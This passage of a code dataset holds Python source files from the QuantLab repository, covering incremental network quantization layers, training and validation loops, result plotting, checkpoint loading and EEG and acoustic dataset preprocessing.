'../../../CIFAR-10/logs/exp293/saves/best.ckpt' # BNN\n state_dicts = torch.load(path, map_location='cpu')\n model.load_state_dict(state_dicts['indiv']['net'])\n print('non-quant values, layer 3: %8d' % (\n torch.isnan(model.phi3_conv.weightFrozen).sum(dtype=torch.long).item()))\n print('total values, layer 3: %8d' % (model.phi3_conv.weightFrozen.numel()))\n \n \n import matplotlib.pyplot as plt\n plt.hist(model.phi3_conv.weightFrozen.flatten(), \n bins=201)\n plt.hist(model.phi3_conv.weight.detach().flatten(), \n bins=201)\n \n \n #########################################################\n # verification: no information in non-quantized weights\n #########################################################\n verification = False\n if verification:\n quantModules = INQController.getInqModules(model)\n \n #check proper quantization levels\n from matplotlib import pyplot as plt\n plt.hist(quantModules[4].weightFrozen.detach().flatten().numpy(), bins=30)\n \n #remove non-quantized information for test run\n for m in quantModules:\n m.weight.data.zero_()\n state_dicts['indiv']['net'] = model.state_dict()\n torch.save(state_dicts, path.replace('.ckpt', '_verify.ckpt'))\n \n" }, { "alpha_fraction": 0.5296861529350281, "alphanum_fraction": 0.5388818383216858, "avg_line_length": 40.44198989868164, "blob_id": "465b4e60856334180f5ef3a4acc53600588323fd", "content_id": "355265a1ec92a3f7000ea7890a951b5e4905e3b1", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15007, "license_type": "permissive", "max_line_length": 128, "num_lines": 362, "path": "/quantlab/indiv/inq_ops.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 ETH Zurich, Lukas Cavigelli\n\nimport math\nimport itertools\nimport torch \nimport torch.nn as nn\nimport quantlab.indiv as indiv\n\nclass INQController(indiv.Controller):\n \"\"\"Instantiate typically once per network, provide it with a list of INQ \n modules to control and a INQ schedule, and insert a call to the step \n function once per epoch. \"\"\"\n def __init__(self, modules, schedule, clearOptimStateOnStep=False, \n stepEveryEpoch=False, rescaleWeights=False):\n super().__init__()\n self.modules = modules\n schedule = {int(k): v for k, v in schedule.items()} #parse string keys to ints\n self.schedule = schedule # dictionary mapping epoch to fraction\n self.clearOptimStateOnStep = clearOptimStateOnStep\n self.fraction = 0.0\n self.stepEveryEpoch = stepEveryEpoch\n self.rescaleWeights = rescaleWeights\n \n def step_preTraining(self, epoch, optimizer=None, tensorboardWriter=None):\n \n if epoch in self.schedule.keys():\n self.fraction = self.schedule[epoch]\n elif self.stepEveryEpoch:\n pass\n else:\n return\n \n #log to tensorboard\n if tensorboardWriter != None:\n tensorboardWriter.add_scalar('INQ/fraction', \n self.fraction, global_step=epoch)\n \n #step each INQ module\n for m in self.modules: \n m.step(self.fraction)\n\n #clear optimizer state (e.g. Adam's momentum)\n if self.clearOptimStateOnStep and optimizer != None:\n optimizer.state.clear()\n \n def step_postOptimStep(self, *args, **kwargs):\n if self.rescaleWeights:\n for m in self.modules:\n m.weightInqCtrl.rescaleWeights()\n \n @staticmethod\n def getInqModules(net):\n return [m \n for m in net.modules() \n if (isinstance(m, INQLinear) or isinstance(m, INQConv1d) or \n isinstance(m, INQConv2d))]\n\n \nclass INQParameterController:\n \"\"\"Used to implement INQ functionality within a custom layer (e.g. INQConv2d).\n Creates and register all relevant fields and parameters in the module. \"\"\"\n def __init__(self, module, parameterName, numLevels=3, \n strategy=\"magnitude\", backCompat=True, \n quantInitMethod=None):#'uniform-l1opt'\n \n self.module = module\n self.parameterName = parameterName\n self.backCompat = backCompat\n \n self.numLevels = numLevels\n self.strategy = strategy # \"magnitude\" or \"random\" or \"magnitude-SRQ\"/\"RPR\"\n self.fraction = 0.0\n self.quantInitMethod = quantInitMethod\n \n if self.backCompat:\n assert(parameterName == 'weight')\n assert(not hasattr(module, 'weightFrozen'))\n assert(not hasattr(module, 'sParam'))\n self.pnameFrozen = 'weightFrozen'\n self.pnameS = 'sParam'\n else:\n #more structured; adds support for multiple indep. INQ parameters\n self.pnameFrozen = parameterName + '_inqFrozen'\n self.pnameS = parameterName + '_inqS'\n \n module.__setattr__(self.pnameFrozen, \n nn.Parameter(torch.full_like(self.weight, float('NaN')), \n requires_grad=False))\n module.__setattr__(self.pnameS, \n nn.Parameter(torch.full((1,), float('NaN')).to(self.weight), \n requires_grad=False))\n \n def getWeightParams(self, module):\n weight = module.__getattr__(self.parameterName)\n weightFrozen = module.__getattr__(self.pnameFrozen)\n return weight, weightFrozen\n \n @property\n def weight(self):\n return self.module.__getattr__(self.parameterName)\n \n @property\n def weightFrozen(self):\n return self.module.__getattr__(self.pnameFrozen)\n \n @property\n def sParam(self):\n return self.module.__getattr__(self.pnameS)\n \n @property\n def s(self):\n return self.sParam.item()\n @s.setter\n def s(self, value):\n self.sParam[0] = value\n \n @staticmethod\n def inqQuantize(weight, quantLevels):\n \"\"\"Quantize a single weight using the INQ quantization scheme.\"\"\"\n \n bestQuantLevel = torch.zeros_like(weight)\n minQuantError = torch.full_like(weight, float('inf'))\n \n for ql in quantLevels:\n qerr = (weight-ql).abs()\n mask = qerr < minQuantError\n bestQuantLevel[mask] = ql\n minQuantError[mask] = qerr[mask]\n \n quantizedWeight = bestQuantLevel\n return quantizedWeight\n \n def inqStep(self, fraction):\n \n \n if self.quantInitMethod == None:\n #update s\n if self.fraction == 0.0 and math.isnan(self.s):\n self.s = torch.max(torch.abs(self.weight.data)).item()\n \n #compute quantization levels\n n_1 = math.floor(math.log((4*self.s)/3, 2))\n n_2 = int(n_1 + 2 - (self.numLevels // 2))\n if self.numLevels >= 3:\n quantLevelsPos = (2**i for i in range(n_2, n_1+1))\n quantLevelsNeg = (-2**i for i in range(n_2, n_1+1))\n quantLevels = itertools.chain(quantLevelsPos, [0], quantLevelsNeg)\n else: \n assert(self.numLevels == 2)\n quantLevels = [self.s/2, -self.s/2]#[2**n_2, -2**n_2]\n \n elif self.quantInitMethod == 'uniform':\n # update s\n if self.fraction == 0.0 and math.isnan(self.s):\n self.s = torch.max(torch.abs(self.weight.data)).item()\n\n #compute quantization levels\n quantLevels = torch.linspace(-self.s, self.s, steps=self.numLevels)\n\n elif self.quantInitMethod in ['uniform-l1opt', \n 'uniform-l2opt', \n 'uniform-perCh-l2opt', \n 'uniform-linfopt']:\n getQLs = lambda s: torch.linspace(-s, s, steps=self.numLevels)\n if self.fraction == 0.0 and math.isnan(self.s):\n import scipy.optimize\n def optimWeight(weight):\n def loss(s):\n s = s.item()\n qls = getQLs(s)\n for i, ql in enumerate(qls):\n tmp = (weight-ql).abs()\n if i == 0:\n minQuantErr = tmp\n else:\n minQuantErr = torch.min(minQuantErr, tmp)\n if self.quantInitMethod == 'uniform-l1opt':\n return minQuantErr.norm(p=1).item()\n elif self.quantInitMethod in ['uniform-l2opt', 'uniform-perCh-l2opt']:\n return minQuantErr.norm(p=2).item()\n elif self.quantInitMethod == 'uniform-linfopt':\n return minQuantErr.norm(p=float('inf')).item()\n else:\n assert(False)\n bounds = (1e-6, weight.abs().max().item())\n optRes = scipy.optimize.brute(loss, ranges=(bounds,), \n Ns=1000, disp=True, \n finish=scipy.optimize.fmin)\n s = optRes[0]\n weight.mul_(1/s)\n s = 1 \n return s\n \n if self.quantInitMethod in ['uniform-l1opt', \n 'uniform-l2opt', \n 'uniform-linfopt']:\n self.s = optimWeight(self.weight.data.flatten().detach())\n elif self.quantInitMethod in ['uniform-perCh-l2opt']:\n self.s = 1\n for c in range(self.weight.size(0)):\n optimWeight(self.weight.data[c].flatten().detach())\n quantLevels = getQLs(self.s)\n else:\n assert(False)\n self.fraction = fraction\n\n if self.strategy == \"magnitude-SRQ\" or self.strategy == \"RPR\":\n if self.fraction == None:\n return\n \n #get current weights quantized\n self.weightFrozen.data.copy_(self.inqQuantize(self.weight.data, quantLevels))\n numUnFreeze = int((1-self.fraction)*self.weight.numel())\n idxsUnFreeze = torch.randperm(self.weight.numel())[:numUnFreeze]\n self.weightFrozen.data.flatten()[idxsUnFreeze] = float('NaN')\n \n else:\n #get number of weights to quantize\n prevCount = self.weightFrozen.numel() - torch.isnan(self.weightFrozen.data).sum(dtype=torch.long).item()\n newCount = int(self.fraction*self.weightFrozen.numel())\n \n #find indexes of weights to quant\n if self.strategy == \"magnitude\":\n self.weight.data[~torch.isnan(self.weightFrozen.data)].fill_(0)\n _, idxsSorted = self.weight.data.flatten().abs().sort(descending=True)\n elif self.strategy == \"random\":\n idxsSorted = torch.randperm(self.weight.numel())\n else:\n assert(False)\n idxsFreeze = idxsSorted[:newCount-prevCount]\n \n #quantize the weights at these indexes\n self.weightFrozen.data.flatten()[idxsFreeze] = self.inqQuantize(self.weight.data.flatten()[idxsFreeze], quantLevels)\n \n def inqAssembleWeight(self, module=None):\n \n #with nn.DataParallel, the module is copied, so self.module cannot be used\n weight, weightFrozen = self.getWeightParams(module)\n \n weightFrozen = weightFrozen.detach()\n frozen = ~torch.isnan(weightFrozen)\n weightAssembled = torch.zeros_like(weightFrozen)\n weightAssembled[frozen] = weightFrozen[frozen]\n fullPrecSelector = torch.isnan(weightFrozen).float()\n tmp = fullPrecSelector*weight\n weightAssembled = weightAssembled + tmp\n return weightAssembled\n \n def rescaleWeights(self):\n self.weight.data.mul_((self.s/2)/self.weight.data.abs().mean().item())\n\n\nclass INQLinear(nn.Linear):\n def __init__(self, in_features, out_features, bias=True, \n numLevels=3, strategy=\"magnitude\", quantInitMethod=None):\n \n super().__init__(in_features, out_features, bias)\n self.weightInqCtrl = INQParameterController(self, 'weight', \n numLevels, strategy,\n quantInitMethod=quantInitMethod)\n \n def step(self, fraction):\n self.weightInqCtrl.inqStep(fraction)\n\n def forward(self, input):\n weightAssembled = self.weightInqCtrl.inqAssembleWeight(self)\n return nn.functional.linear(input, weightAssembled, self.bias)\n \n \nclass INQConv1d(nn.Conv1d):\n def __init__(self, in_channels, out_channels, kernel_size, \n stride=1, padding=0, dilation=1, groups=1, \n bias=True, padding_mode='zeros', \n numLevels=3, strategy=\"magnitude\", quantInitMethod=None):\n \n super().__init__(in_channels, out_channels, kernel_size, \n stride, padding, dilation, groups, \n bias, padding_mode)\n \n self.weightInqCtrl = INQParameterController(self, 'weight', \n numLevels, strategy,\n quantInitMethod=quantInitMethod)\n \n def step(self, fraction):\n self.weightInqCtrl.inqStep(fraction)\n\n def forward(self, input):\n weightAssembled = self.weightInqCtrl.inqAssembleWeight(self)\n \n if self.padding_mode == 'circular':\n expanded_padding = ((self.padding[0] + 1) // 2, self.padding[0] // 2)\n return nn.functional.conv1d(\n nn.functional.pad(input, expanded_padding, mode='circular'),\n weightAssembled, self.bias, self.stride,\n (0,), self.dilation, self.groups)\n return nn.functional.conv1d(input, weightAssembled, self.bias, self.stride,\n self.padding, self.dilation, self.groups)\n \n \nclass INQConv2d(nn.Conv2d):\n def __init__(self, in_channels, out_channels, kernel_size, \n stride=1, padding=0, dilation=1, groups=1, \n bias=True, padding_mode='zeros', \n numLevels=3, strategy=\"magnitude\", quantInitMethod=None):\n \n super().__init__(in_channels, out_channels, kernel_size, \n stride, padding, dilation, groups, \n bias, padding_mode)\n \n self.weightInqCtrl = INQParameterController(self, 'weight', \n numLevels, strategy,\n quantInitMethod=quantInitMethod)\n \n def step(self, fraction):\n self.weightInqCtrl.inqStep(fraction)\n\n def forward(self, input):\n weightAssembled = self.weightInqCtrl.inqAssembleWeight(self)\n \n if self.padding_mode == 'circular':\n expanded_padding = ((self.padding[1] + 1) // 2, self.padding[1] // 2,\n (self.padding[0] + 1) // 2, self.padding[0] // 2)\n return nn.functional.conv2d(nn.functional.pad(input, expanded_padding, mode='circular'),\n weightAssembled, self.bias, self.stride,\n (0,), self.dilation, self.groups)\n\n return nn.functional.conv2d(input, weightAssembled, self.bias, self.stride,\n self.padding, self.dilation, self.groups)\n\nif __name__ == '__main__':\n x = torch.linspace(-2,2,100)\n numLevels = 3\n s = torch.max(torch.abs(x)).item()\n \n n_1 = math.floor(math.log((4*s)/3, 2))\n n_2 = int(n_1 + 2 - (numLevels//2))\n quantLevelsPos = (2**i for i in range(n_2, n_1+1))\n quantLevelsNeg = (-2**i for i in range(n_2, n_1+1))\n quantLevels = itertools.chain(quantLevelsPos, [0], quantLevelsNeg)\n \n x_q = INQParameterController.inqQuantize(x, quantLevels)\n \n \n import matplotlib.pyplot as plt\n plt.clf()\n plt.plot(x.numpy())\n plt.plot(x_q.numpy())\n\n\n model = INQLinear(2, 3, bias=False, \n numLevels=numLevels, strategy=\"RPR\")\n\n print(model.weight)\n print(model.weightFrozen)\n model.step(0.5)\n print(model.weight)\n print(model.weightFrozen)\n \n x = torch.randn(4,2)\n y = model(x)\n L = y.norm(p=2)\n L.backward()\n \n" }, { "alpha_fraction": 0.5408163070678711, "alphanum_fraction": 0.545634925365448, "avg_line_length": 35.75, "blob_id": "8df17a6e4eb830f19ef6a4dceaef4b2aeaddcf1f", "content_id": "50459d059b6451e13e7e3528db4c850a6fdac807", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3528, "license_type": "permissive", "max_line_length": 116, "num_lines": 96, "path": "/quantlab/protocol/rooms.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 UniMoRe, Matteo Spallanzani\n# Copyright (c) 2019 ETH Zurich, Lukas Cavigelli\n\nfrom progress.bar import FillingSquaresBar\nimport torch\nimport quantlab.indiv as indiv\n\ndef train(logbook, net, device, loss_fn, opt, train_l):\n \"\"\"Run one epoch of the training experiment.\"\"\"\n logbook.meter.reset()\n bar = FillingSquaresBar('Training \\t', max=len(train_l))\n controllers = indiv.Controller.getControllers(net)\n \n for i_batch, data in enumerate(train_l):\n \n # load data onto device\n inputs, gt_labels = data\n inputs = inputs.to(device)\n gt_labels = gt_labels.to(device)\n \n # forprop\n pr_outs = net(inputs)\n loss = loss_fn(pr_outs, gt_labels)\n \n # update statistics\n logbook.meter.update(pr_outs, gt_labels, loss.item(), track_metric=logbook.track_metric)\n bar.suffix = 'Total: {total:} | ETA: {eta:} | Epoch: {epoch:4d} | ({batch:5d}/{num_batches:5d})'.format(\n total=bar.elapsed_td,\n eta=bar.eta_td,\n epoch=logbook.i_epoch,\n batch=i_batch + 1,\n num_batches=len(train_l))\n bar.suffix = bar.suffix + logbook.meter.bar()\n bar.next()\n \n # backprop\n opt.zero_grad()\n loss.backward()\n opt.step()\n for ctrl in controllers: \n ctrl.step_postOptimStep()\n \n bar.finish()\n stats = {\n 'train_loss': logbook.meter.avg_loss,\n 'train_metric': logbook.meter.avg_metric\n }\n for k, v in stats.items():\n if v:\n logbook.writer.add_scalar(k, v, global_step=logbook.i_epoch)\n logbook.writer.add_scalar('learning_rate', opt.param_groups[0]['lr'], global_step=logbook.i_epoch)\n return stats\n\n\ndef test(logbook, net, device, loss_fn, test_l, valid=False, prefix=None):\n \"\"\"Run a validation epoch.\"\"\"\n logbook.meter.reset()\n bar_title = 'Validation \\t' if valid else 'Test \\t'\n bar = FillingSquaresBar(bar_title, max=len(test_l))\n with torch.no_grad():\n for i_batch, data in enumerate(test_l):\n \n # load data onto device\n inputs, gt_labels = data\n inputs = inputs.to(device)\n gt_labels = gt_labels.to(device)\n \n # forprop\n tensor_stats, pr_outs = net.forward_with_tensor_stats(inputs)\n loss = loss_fn(pr_outs, gt_labels)\n \n # update statistics\n logbook.meter.update(pr_outs, gt_labels, loss.item(), track_metric=True)\n bar.suffix = 'Total: {total:} | ETA: {eta:} | Epoch: {epoch:4d} | ({batch:5d}/{num_batches:5d})'.format(\n total=bar.elapsed_td,\n eta=bar.eta_td,\n epoch=logbook.i_epoch,\n batch=i_batch + 1,\n num_batches=len(test_l))\n bar.suffix = bar.suffix + logbook.meter.bar()\n bar.next()\n bar.finish()\n\n if prefix == None: \n prefix = 'valid' if valid else 'test'\n stats = {\n prefix+'_loss': logbook.meter.avg_loss,\n prefix+'_metric': logbook.meter.avg_metric\n }\n if valid:\n for k, v in stats.items():\n if v:\n logbook.writer.add_scalar(k, v, global_step=logbook.i_epoch)\n for name, tensor in tensor_stats:\n logbook.writer.add_histogram(name, tensor, global_step=logbook.i_epoch)\n return stats\n" }, { "alpha_fraction": 0.6031042337417603, "alphanum_fraction": 0.6082779169082642, "avg_line_length": 33.91613006591797, "blob_id": "9007640e0872b7926ea8b8cd8e1fa8909bae955d", "content_id": "5007ebf2f58affe1f2a11613f9073256c8d4bb3f", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5412, "license_type": "permissive", "max_line_length": 101, "num_lines": 155, "path": "/plot_npz_tb.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "import os\nimport numpy as np\nimport argparse\nimport matplotlib.pyplot as plt\n\n\ndef plot_npz(filename, export=None, act_quant_line=None):\n data = dict(np.load(filename))\n if 'num_trials' in data:\n del data['num_trials']\n plot_data(data, export, act_quant_line)\n\n\ndef plot_tb(filename, export=None, act_quant_line=None):\n from eegnet_run import _prepare_scalar_array_from_tensorboard as prepare_tb_array\n from tensorboard.backend.event_processing.event_accumulator import EventAccumulator\n ea = EventAccumulator(filename)\n ea.Reload()\n data = {key: prepare_tb_array(ea, key) for key in ea.Tags()['scalars']}\n plot_data(data, export, act_quant_line)\n\n\ndef plot_data(data, export=None, act_quant_line=None):\n # decide for each key to which plot it should belong\n loss_plot = {}\n acc_plot = {}\n\n n_epochs = None\n\n for name, array in data.items():\n if n_epochs is None:\n n_epochs = len(array)\n else:\n assert len(array) == n_epochs, f\"{name} has length {len(array)} but should be {n_epochs}\"\n\n l_name = name.lower()\n if 'metric' in l_name or 'acc' in l_name or 'accuracy' in l_name:\n acc_plot[name] = array\n elif 'loss' in l_name:\n loss_plot[name] = array\n elif l_name == 'learning_rate':\n pass\n else:\n # ask user to which plot it should be added\n choice = input(f\"Where to put {name}? [b]oth, [l]oss, [a]ccuracy, [N]one? > \")\n choice = choice.lower() if choice else 'n'\n assert choice in ['b', 'l', 'a', 'n']\n if choice in ['b', 'l']:\n loss_plot[name] = array\n if choice in ['b', 'a']:\n acc_plot[name] = array\n\n generate_figure(loss_plot, acc_plot, n_epochs, export, act_quant_line)\n\n\ndef generate_figure(loss_plot, acc_plot, n_epochs, export=None, act_quant_line=None):\n\n # make sure that the environment variables are set (to hide the unnecessary output)\n if \"XDG_RUNTIME_DIR\" not in os.environ:\n tmp_dir = \"/tmp/runtime-eegnet\"\n os.environ[\"XDG_RUNTIME_DIR\"] = tmp_dir\n if not os.path.exists(tmp_dir):\n os.makedirs(tmp_dir)\n os.chmod(tmp_dir, 700)\n\n # prepare data\n x = np.array(range(1, n_epochs + 1))\n\n # prepare the plot\n fig = plt.figure(figsize=(20, 10))\n\n # do loss figure\n loss_subfig = fig.add_subplot(121)\n add_subplot(loss_plot, x, loss_subfig, \"Loss\", \"upper center\", act_quant_line)\n\n # do accuracy figure\n acc_subfig = fig.add_subplot(122)\n add_subplot(acc_plot, x, acc_subfig, \"Accuracy\", \"lower center\", act_quant_line)\n\n # save the image\n if export is None:\n plt.show()\n else:\n fig.savefig(export, bbox_inches='tight')\n\n # close\n plt.close('all')\n\n\ndef add_subplot(data, x, subfig, title, legend_pos=None, act_quant_line=None):\n plt.grid()\n colors = plt.rcParams['axes.prop_cycle'].by_key()['color']\n\n additional_axis = []\n lines = []\n\n if act_quant_line is not None:\n lines.append(plt.axvline(x=act_quant_line, label='Activation Quantization', color=colors[2]))\n\n for i, key in enumerate(data.keys()):\n if key.startswith('train_'):\n new_lines = subfig.plot(x, data[key], label=key, color=colors[0])\n elif key.startswith('valid_'):\n new_lines = subfig.plot(x, data[key], label=key, color=colors[1])\n else:\n tmp_axis = subfig.twinx()\n tmp_axis.set_ylabel(key)\n new_lines = tmp_axis.plot(x, data[key], label=key, color=colors[i+3])\n additional_axis.append(tmp_axis)\n lines += new_lines\n\n for i, axis in enumerate(additional_axis):\n axis.spines['right'].set_position(('axes', 1 + i * 0.15))\n if i > 0:\n axis.set_frame_on(True)\n axis.patch.set_visible(False)\n\n subfig.set_title(title)\n subfig.set_xlabel(\"Epoch\")\n\n labels = [l.get_label() for l in lines]\n last_ax = additional_axis[-1] if additional_axis else subfig\n last_ax.legend(lines, labels, frameon=True, framealpha=1, facecolor='white', loc=legend_pos)\n\n return len(additional_axis)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('file', help='filename of the data', nargs=1)\n parser.add_argument('-t', '--tensorboard', help='Data is of tensorboard format',\n action='store_true')\n parser.add_argument('-n', '--numpy', help='Data is of numpy npz format',\n action='store_true')\n parser.add_argument('-e', '--export', help='export plot to specified file', type=str)\n parser.add_argument('--act_quant_line', help='position of vertical line', type=int)\n\n args = parser.parse_args()\n\n # if both tensorboard and numpy are not set, infer the type by the file ending\n filename = args.file[0]\n if not args.tensorboard and not args.numpy:\n if 'events.out.tfevents' in filename:\n args.tensorboard = True\n elif filename.endswith('.npz'):\n args.numpy = True\n else:\n raise RuntimeError(f'Cannot automatically detect type of the file: {args.file}')\n\n if args.tensorboard:\n plot_tb(filename, args.export, args.act_quant_line)\n elif args.numpy:\n plot_npz(filename, args.export, args.act_quant_line)\n else:\n raise RuntimeError()\n" }, { "alpha_fraction": 0.5378422141075134, "alphanum_fraction": 0.544283390045166, "avg_line_length": 26, "blob_id": "995b60b5dfb96b3088a2a36ded540a88688d4d19", "content_id": "c522e2d3e617b1c9e0354d8c10763c84ca060b2f", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 621, "license_type": "permissive", "max_line_length": 66, "num_lines": 23, "path": "/quantlab/indiv/__init__.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 ETH Zurich, Lukas Cavigelli\n\nclass Controller(object):\n def __init__(self):\n pass\n \n def step(self, epoch, optimizer=None, tensorboardWriter=None):\n pass\n \n def step_preTraining(self, *args, **kwargs):\n self.step(*args, **kwargs)\n \n def step_preValidation(self, *args, **kwargs):\n pass\n \n def step_postOptimStep(self, *args, **kwargs):\n pass\n \n @staticmethod\n def getControllers(net):\n return [v for m in net.modules() \n for v in m.__dict__.values() \n if isinstance(v, Controller)]\n" }, { "alpha_fraction": 0.5976851582527161, "alphanum_fraction": 0.6032407283782959, "avg_line_length": 39, "blob_id": "2669a847e40478b554fa267a86ff07a48499a21e", "content_id": "e6e4524cb7965771df8c2b36697249e3306e5687", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2160, "license_type": "permissive", "max_line_length": 131, "num_lines": 54, "path": "/quantlab/indiv/transfer.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 UniMoRe, Matteo Spallanzani\n# Copyright (c) 2019 ETH Zurich, Lukas Cavigelli\n\nimport os\nimport torch\n\nfrom quantlab.protocol.logbook import _exp_align_, _ckpt_align_\n\n\ndef load_pretrained(logbook, net):\n \n #get path to pretrained network\n pre_config = logbook.config['indiv']['net']['pretrained']\n if isinstance(pre_config['file'], str):\n ckpt_file = os.path.join(os.path.dirname(logbook.dir_logs), logbook.topology, 'pretrained', pre_config['file'])\n if not os.path.exists(ckpt_file):\n ckpt_file = pre_config['file']\n elif isinstance(pre_config['file'], dict):\n dir_exp = 'exp' + str(pre_config['file']['exp_id']).rjust(_exp_align_, '0')\n epoch_str = str(pre_config['file']['epoch'])\n if epoch_str.isnumeric():\n ckpt_id = epoch_str.rjust(_ckpt_align_, '0')\n ckpt_name = 'epoch' + ckpt_id + '.ckpt'\n else: \n #e.g. for 'best', 'last'\n ckpt_name = epoch_str + '.ckpt'\n ckpt_file = os.path.join(logbook.dir_logs, dir_exp, 'saves', ckpt_name)\n if logbook.verbose:\n print('Loading checkpoint: {}'.format(ckpt_file))\n \n #load network params\n net_dict = net.state_dict()\n pretrained_dict = torch.load(ckpt_file)['indiv']['net']\n if 'parameters' in pre_config.keys():\n #load selected parameters\n parameters = []\n for group_name in pre_config['parameters']:\n parameters += [k for k in pretrained_dict.keys() if k.startswith(group_name) and not k.endswith('num_batches_tracked')]\n net_dict.update({k: v for k, v in pretrained_dict.items() if k in parameters})\n else:\n #load all parameters if not specified\n net_dict = pretrained_dict \n \n missing_keys, unexpected_keys = net.load_state_dict(net_dict, strict=False)\n \n #report differences\n if len(missing_keys) > 0:\n print('WARNING: missing keys in pretrained net!')\n for k in missing_keys:\n print('key: %s' % k)\n if len(unexpected_keys) > 0:\n print('WARNING: unexpected keys in pretrained net!')\n for k in unexpected_keys:\n print('key: %s' % k)\n" }, { "alpha_fraction": 0.6203840374946594, "alphanum_fraction": 0.6474642753601074, "avg_line_length": 32.295082092285156, "blob_id": "2a8153debb4f24c11c525a31e4e35a2f3d15a4e8", "content_id": "eed531b64f3cd590028c48c317c07138a929fcd3", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2031, "license_type": "permissive", "max_line_length": 78, "num_lines": 61, "path": "/quantlab/ETHZ-CVL-AED/MeyerNet/acousticEventDetDatasetConvert.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 ETH Zurich, Lukas Cavigelli\n\nimport numpy as np\nimport re\nimport os\nimport pickle\n\ndef readSingleFile(fname):\n with open(fname) as f:\n fileCont = f.read()\n arrs = re.findall('array\\(\\[(.*)\\]\\)', fileCont)\n arrs = [np.fromstring(a, sep=',', dtype=np.int16) for a in arrs]\n# print('fname: %s' % fname)\n# print([t.shape for t in arrs])\n arrs = [t.reshape(64,-1) for t in arrs] #shape: n_t x 64\n \n #sum of lengths: 8*60+48+52 = 580\n #'normal' size: 400 --> overlap of 10 on both sides (or 20 on one)\n arrsConcat = [arrs[0]] + [t[:,20:] for t in arrs[1:]]\n spectrogram = np.concatenate(arrsConcat, axis=1)\n return spectrogram #64 x 25600\n\ndef getClasses(rootDir):\n filelist = os.listdir(rootDir) \n # regex for format {className}_{someNum}_{randomString}.csv to parse class\n classes = (re.findall('^(.*)\\_\\d*_.*.csv$', fname) for fname in filelist)\n classes = filter(lambda s: len(s) >= 1, classes)\n classes = (s[0] for s in classes)\n classes = list(set(classes)) # uniquify\n return classes\n\ndef readClassSpectrograms(cl, rootDir):\n filelist = os.listdir(rootDir)\n clFiles = (re.findall('^(%s_.*.csv)$' % cl, fname) for fname in filelist)\n clFiles = filter(lambda s: len(s) >= 1, clFiles)\n clFiles = (rootDir + s[0] for s in clFiles)\n clSpectrograms = [readSingleFile(fname) for fname in clFiles]\n return clSpectrograms\n\n\n#readSingleFile('./test/car_172_offset25.csv')\n#readSingleFile('./test/car_172_offset50.csv')\n\n\n\nclasses = getClasses('./train/')\nprint('classes: %s' % str(classes))\ndatasetTrain = {cl: readClassSpectrograms(cl, './train/') for cl in classes}\ndatasetTest = {cl: readClassSpectrograms(cl, './test/') for cl in classes}\n\nfname = './train.pickle'\nwith open(fname, 'wb') as f:\n pickle.dump(datasetTrain, f)\nfname = './test.pickle'\nwith open(fname, 'wb') as f:\n pickle.dump(datasetTest, f)\n\n\n#import matplotlib.pyplot as plt\n#spectrogram = datasetTrain['acoustic_guitar'][3]\n#plt.imshow(spectrogram)\n" }, { "alpha_fraction": 0.5598063468933105, "alphanum_fraction": 0.5768269896507263, "avg_line_length": 30.86069679260254, "blob_id": "69a8efdfca191a8f0b0dbca17d84cbd4296f7267", "content_id": "622419ef099e5205952c18d67f37969fdf454f76", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6404, "license_type": "permissive", "max_line_length": 125, "num_lines": 201, "path": "/quantlab/BCI-CompIV-2a/EEGNet/preprocess.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 UniMoRe, Matteo Spallanzani, Tibor Schneider\n\nfrom os import path\n\nimport numpy as np\nimport scipy.io as sio\nfrom scipy.signal import butter, sosfilt\nimport numpy as np\nimport torch as t\nfrom torchvision.transforms import ToTensor, Normalize, Compose\n\nfrom quantlab.treat.data.split import transform_random_split\n\n\n\"\"\"\nIn order to use this preprocessing module, use the following 'data' configuration\n\n\"data\": {\n \"subject\": 1\n \"fs\": 250,\n \"f1_fraction\": 1.5,\n \"f2_fraction\": 6.0,\n \"filter\": {\n # SEE BELOW\n }\n \"valid_fraction\": 0.1,\n \"bs_train\": 32,\n \"bs_valid\": 32,\n \"use_test_as_valid\": false\n}\n\nFor using no filter, you can leave out the \"data\".\"filter\" object, or set the \"data\".filter\".\"type\"\nto \"none\".\n\nFor using highpass, use the following filter\n\"filter\": {\n \"type\": \"highpass\",\n \"fc\": 4.0,\n \"order\": 4\n}\n\nFor using bandpass, use the following filter\n\"filter\": {\n \"type\": \"bandpass\",\n \"fc_low\": 4.0,\n \"fc_high\": 40.0,\n \"order\": 5\n}\n\"\"\"\n\n\nclass BCI_CompIV_2a(t.utils.data.Dataset):\n\n def __init__(self, root, train, subject, transform=None):\n self.subject = subject\n self.root = root\n self.train = train\n self.transform = transform\n self.samples, self.labels = self._load_data()\n\n def __len__(self):\n return len(self.samples)\n\n def __getitem__(self, idx):\n sample = self.samples[idx, :, :]\n label = self.labels[idx]\n if self.transform:\n sample = self.transform(sample)\n return sample, label\n\n def _load_data(self):\n NO_channels = 22\n NO_tests = 6 * 48\n Window_Length = 7 * 250\n\n class_return = np.zeros(NO_tests, dtype=np.float32)\n data_return = np.zeros((NO_tests, NO_channels, Window_Length), dtype=np.float32)\n\n n_valid_trials = 0\n if self.train:\n a = sio.loadmat(path.join(self.root, 'A0' + str(self.subject) + 'T.mat'))\n else:\n a = sio.loadmat(path.join(self.root, 'A0' + str(self.subject) + 'E.mat'))\n 